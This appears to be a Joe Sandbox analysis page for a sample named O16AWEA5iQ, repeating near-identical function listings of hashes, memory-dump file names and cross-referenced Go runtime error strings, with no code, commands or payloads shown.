API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: a5c0b58c57da31c26bab6f4731d2cb246ac559b9a239cd028f25c9bc3b969392
Instruction ID: e2433981f4b0e6e7d6374446812641c0270c4291a9305f16055a50d3a18e6d6b
Opcode Fuzzy Hash: a5c0b58c57da31c26bab6f4731d2cb246ac559b9a239cd028f25c9bc3b969392
Instruction Fuzzy Hash: 665174716896C491E666AF91EC887DBA7A5F748B80F494432FA8C53F97EF38C4018344

Function 000002EBF9BA78D8 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: cb96f980013d3f5328d6af0c25adf2f019cac989334f2a3fee63440b75c6ba52
Instruction ID: 8b2d963a9d1a5210e0b53050f09ac590330b274d2f264ca592b89591a7743f37
Opcode Fuzzy Hash: cb96f980013d3f5328d6af0c25adf2f019cac989334f2a3fee63440b75c6ba52
Instruction Fuzzy Hash: E25174716896C491E666AF92EC887DBA7A5F748B80F494432FA8C53F97EF38C4418344

Function 000002EBF9BA7908 Relevance: 7.6, Strings: 6, Instructions: 112COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: c29f2205f95027973cd032f77eae5ae813bdbf29bb364627b7b4df918e9a0260
Instruction ID: de58f32e613a9266c4b94ddd28961731cf5dfa17667b211154ab48c26f1d0031
Opcode Fuzzy Hash: c29f2205f95027973cd032f77eae5ae813bdbf29bb364627b7b4df918e9a0260
Instruction Fuzzy Hash: DE5185716896C491E666AF91EC887DBA7A5F748B80F498432FA8C53F97EF38C4018344

Function 000002EBF9BA7945 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction ID: 5e1577237f7d57a45b364a34bfd55f340cb8e2cfa81458582ace817a283ff141
Opcode Fuzzy Hash: c2dfc05885c33c5d0a7a03473c5bb34f451e612d4c4f7097d7117c9c4a43ca64
Instruction Fuzzy Hash: E95173716896C491E666AF91EC887DFA7A5F748B80F494432FA4853FA6EF38C4018344

Function 000002EBF9BA793F Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: 9f1213cd266099c2a348743b48a3032e4badd928581dcde845af47a335534961
Instruction ID: 617ee8a6739402ddff9d6ebb2bb0825088407709799ea0de289d486d0f1b886a
Opcode Fuzzy Hash: 9f1213cd266099c2a348743b48a3032e4badd928581dcde845af47a335534961
Instruction Fuzzy Hash: 225164716896C491E666AF91EC887DFA7A5F748B80F494432FA4C53FA7EF38C4058344

Function 000002EBF9BA7939 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping$ to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren$, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value "$runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll$runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a$runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma
API String ID: 0-4243375483
Opcode ID: e4f357ab30a371e90d417e02e155ea377db698aea0667f208a0550b213f56376
Instruction ID: 9f97cad3e65770beaeec96795b9aa05e1c6992bb70e41650cae0eefc4a7919f6
Opcode Fuzzy Hash: e4f357ab30a371e90d417e02e155ea377db698aea0667f208a0550b213f56376
Instruction Fuzzy Hash: AE5173716896C491E666AF91EC887DFA7A5F748B80F494432FA4853FA6EF38C4018344

Function 000002EBF9BA7963 Relevance: 7.6, Strings: 6, Instructions: 106COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
